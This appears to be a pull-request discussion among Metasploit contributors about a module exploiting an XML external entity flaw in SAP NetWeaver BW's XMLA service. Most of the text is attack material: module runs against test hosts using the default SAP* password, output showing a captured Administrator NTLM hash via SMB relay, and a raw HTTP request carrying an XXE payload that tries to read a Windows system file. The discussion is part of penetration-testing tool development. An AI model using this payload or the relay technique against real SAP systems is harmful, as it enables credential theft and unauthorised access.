SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay

[nmonkee]

This module exploits the SAP NetWeaver BW XML External Entity vulnerability. An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function. The XXE vulnerability in SAP BW can lead to arbitrary file reading or an SMBRelay attack.

SAP Note 1597066 / DSECRG-12-033.

ref: http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity

[jvazquez-r7]

Trying to run it against windows installation results in the next error:

msf auxiliary(sap_soap_xmla_bw_smb_relay) > show options

Module options (auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLIENT   001              yes       SAP client
   PASS     06071992         yes       Password
   PATH     c:\foo.txt       yes       File path (e.g. \xx.xx.xx.xx\share)
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.172.186  yes       The target address range or CIDR identifier
   RPORT    8000             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   USER     SAP*             yes       Username
   VHOST                     no        HTTP server virtual host

msf auxiliary(sap_soap_xmla_bw_smb_relay) > run

[*] [SAP] 192.168.172.186:8000 - sending request for c:\foo.txt
[-] [SAP] 192.168.172.186:8000 - Error code: 200
[-] [SAP] 192.168.172.186:8000 - Error title: OK
[-] [SAP] 192.168.172.186:8000 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Inconsistent input parameter (parameter: METHOD, value &lt;unknown&gt;)" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[jvazquez-r7]

And test results on Linux, neither access to file contents:

msf auxiliary(sap_soap_xmla_bw_smb_relay) > show options

Module options (auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLIENT   001              yes       SAP client
   PASS     06071992         yes       Password
   PATH     /etc/passwod     yes       File path (e.g. \xx.xx.xx.xx\share)
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.172.179  yes       The target address range or CIDR identifier
   RPORT    8042             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   USER     SAP*             yes       Username
   VHOST                     no        HTTP server virtual host

msf auxiliary(sap_soap_xmla_bw_smb_relay) > run

[*] [SAP] 192.168.172.179:8042 - sending request for /etc/passwod
[-] [SAP] 192.168.172.179:8042 - Error code: 200
[-] [SAP] 192.168.172.179:8042 - Error title: OK
[-] [SAP] 192.168.172.179:8042 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Request transfered is not a valid XML/SOAP document" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[jvazquez-r7]

Any clues? Am I doing something wrong to test this module?

[nmonkee]

works fine:

msf  auxiliary(sap_soap_xmla_bw_smb_relay) > run
[*] [SAP] 192.168.1.86:8000 - sending request for \\192.168.1.71\share
[*] SMB Captured - 2013-05-09 22:31:02 +0100
NTLMv1 Response Captured from 192.168.1.86:51291 - 192.168.1.86 
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled 
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
[*] [SAP] 192.168.1.86:8000 - Error code: 200
[*] [SAP] 192.168.1.86:8000 - Error title: OK
[*] [SAP] 192.168.1.86:8000 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Request transfered is not a valid XML/SOAP document" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[jvazquez-r7]

It's just the smb relay part, isn't working the XXE expansion vuln? I dont see this module complete if we can't read arbitrary remote files.

[nmonkee]

"An attacker can attempt to generate a "denial of service" situation or start an "SMB relay attack" using Document Type Definitions (DTD) via the SOAP/XMLA interface."

ref: https://service.sap.com/sap/support/notes/1597066

Any file read attempt results in error: "Request transfered is not a valid XML/SOAP document". I think this is a red herring as far as arbitrary file read goes. Unless there is some trick I'm not aware of or haven't tried.

POST /sap/bw/xml/soap/xmla?sap-client=001&sap-language=EN HTTP/1.0
Host: 10.0.7.19:8000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sap-usercontext=sap-language=EN&sap-client=001
Authorization: Basic U0FQKjowNjA3MTk5Mg==
Content-Type: text/xml; charset=UTF-8
Content-Length: 126
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE request
[ 
<!ENTITY include SYSTEM "file:///c:/windows/win.ini">
>]

[jvazquez-r7]

@nmonkee shared pcap's for verification from the smb relay attacks. Looks good. Merged after little final cleanup:

d9bdf3d